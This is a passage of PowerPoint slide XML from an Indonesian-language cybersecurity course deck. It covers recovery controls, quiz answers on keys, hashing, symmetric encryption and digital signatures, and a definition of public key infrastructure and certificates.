              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memulihkan-menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14752734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D" dirty="0"/>
              <a:t>Bagian mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirahasiakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-cipher, ciphertext, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>The Key, Key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirahasiakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun yang punya key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengingat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hashing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hashing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibalik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hashing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Integrity verification &amp; authentication, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Hashing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data (integrity), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> password (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> plaintext), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Properti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijamin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Confidentiality, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>Karena data hanya bisa dibuka oleh pihak yang punya kunci yang sama, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Apa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifat-sifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>? Public = shareable, Private = secret, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penandatanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Hash message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → encrypt hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> private key → receiver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> public key</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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3391558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Public Key Infrastructure (PKI)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernyataan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>divalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otoritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CA).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
